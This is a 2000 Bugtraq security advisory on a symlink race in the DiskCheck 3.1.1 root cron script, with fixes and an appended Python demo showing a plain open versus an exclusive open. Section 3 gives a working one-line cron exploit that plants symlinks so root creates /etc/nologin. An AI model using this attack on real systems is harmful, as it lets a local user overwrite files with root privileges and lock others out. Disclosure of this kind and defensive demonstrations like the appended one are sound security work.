Date: Sat, 5 Aug 2000 17:36:13 +0900
From: "You, Jin-Ho" <jhyou@CHONNAM.CHONNAM.AC.KR>
Subject: Diskcheck 3.1.1 Symlink Vulnerability
To: BUGTRAQ@SECURITYFOCUS.COM

Diskcheck 3.1.1 Symlink Vulnerability

1 Introduction

DiskCheck is a Perl script that monitors how much space is available on your hard drive. It checks your drive space every hour and takes action based on the settings in its config file, /etc/diskcheck.conf. DiskCheck 3.1.1 is available from http://www.kaybee.org/~kirk/html/linux.html and is shipped in RedHat Powertools 6.x.

2 Vulnerability

The script /etc/cron.hourly/diskcheck.pl is executed with root privileges every hour. It writes a temporary file whose default name, /tmp/diskusagealert.txt.<pid>, is set in /etc/diskcheck.conf. That name is predictable (it depends only on the process ID), the file lives in the world-writable /tmp, and the script opens it without an exclusive create, so it follows an existing symbolic link. A local user who plants a symlink at the expected name can therefore have root create or overwrite an arbitrary file.

3 Exploit

The following cron job, run by an unprivileged user, creates the file /etc/nologin (which blocks logins by non-root users). It runs at the same minute as the root cron job and guesses the PID diskcheck.pl will receive by planting symlinks for the 200 PIDs following its own; the guess only has to be right once.

0 * * * * perl -e 'foreach $i (1..200) { $pid = $$ + $i; \
  symlink("/etc/nologin", "/tmp/diskusagealert.txt.$pid"); }'

4 Solution

Relocate the temporary file to a directory in which only root can create files.

Example) Edit /etc/diskcheck.conf

$tempfile = '/var/local/diskusagealert.txt'

# ls -ld /var/local
drwxr-xr-x   2 root     root         1024 Feb  7  1996 /var/local/

Moving the file out of /tmp removes the attacker's ability to plant the link in the first place. A more robust fix is to create the file with an unpredictable name and an exclusive open (for example Perl's File::Temp, which uses O_CREAT|O_EXCL), so that a pre-existing symlink causes the open to fail rather than be followed.

You, Jin-Ho, jhyou@chonnam.ac.kr
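To make the failure mode concrete, here is an added example that is not part of the advisory and not DiskCheck's own code (DiskCheck is written in Perl; this is a Python illustration of the same pattern). Inside a private temporary directory it plants a symlink at an attacker-predicted name, then shows that a plain open follows the link and creates its target, while an exclusive, no-follow open refuses and creates nothing. The file names and the alert text are constructed for the demonstration.

```python
import errno
import os
import tempfile

ALERT_TEXT = "disk usage alert\n"  # constructed stand-in for diskcheck's report


def vulnerable_write(path, data):
    """The diskcheck pattern: a plain open(2) with O_CREAT and no O_EXCL.

    If `path` is already a symlink, the kernel follows it and the write lands
    on the link's target, created if necessary, with the writer's privileges.
    """
    with open(path, "w") as f:
        f.write(data)


def safe_write(path, data):
    """Exclusive create: fails if anything (file or symlink) already exists.

    O_CREAT|O_EXCL refuses an existing path even when it is a dangling
    symlink; O_NOFOLLOW (where available) additionally refuses a symlink.
    Mode 0o600 keeps the report private. Combine with an unpredictable name
    (tempfile.mkstemp does exactly this) for a complete fix.
    """
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(data)


def run_demo():
    """Return (hijacked, blocked): did the plain open follow the planted link,
    and did the exclusive open refuse the same link without creating anything?"""
    with tempfile.TemporaryDirectory() as tmp:
        target = os.path.join(tmp, "nologin")                # stands in for /etc/nologin
        link = os.path.join(tmp, "diskusagealert.txt.1234")  # attacker-predicted name
        os.symlink(target, link)                             # attacker plants the link

        # 1. Vulnerable open: the symlink is followed and "nologin" appears.
        vulnerable_write(link, ALERT_TEXT)
        hijacked = os.path.isfile(target) and not os.path.islink(target)
        if hijacked:
            with open(target) as f:
                hijacked = f.read() == ALERT_TEXT
            os.unlink(target)                                # reset; link dangles again

        # 2. Exclusive open on the same planted link: refused, nothing created.
        try:
            safe_write(link, ALERT_TEXT)
            blocked = False
        except OSError as e:
            blocked = e.errno in (errno.EEXIST, errno.ELOOP)
        blocked = blocked and not os.path.exists(target)
        return hijacked, blocked


if __name__ == "__main__":
    print(run_demo())  # (True, True)
```

The exclusive open is the check a practitioner would want regardless of where the file lives: relocating to a root-only directory stops an unprivileged user from planting the link, but an O_EXCL create with a random name (File::Temp in Perl, tempfile.mkstemp here) also defends against any future change to the directory's permissions.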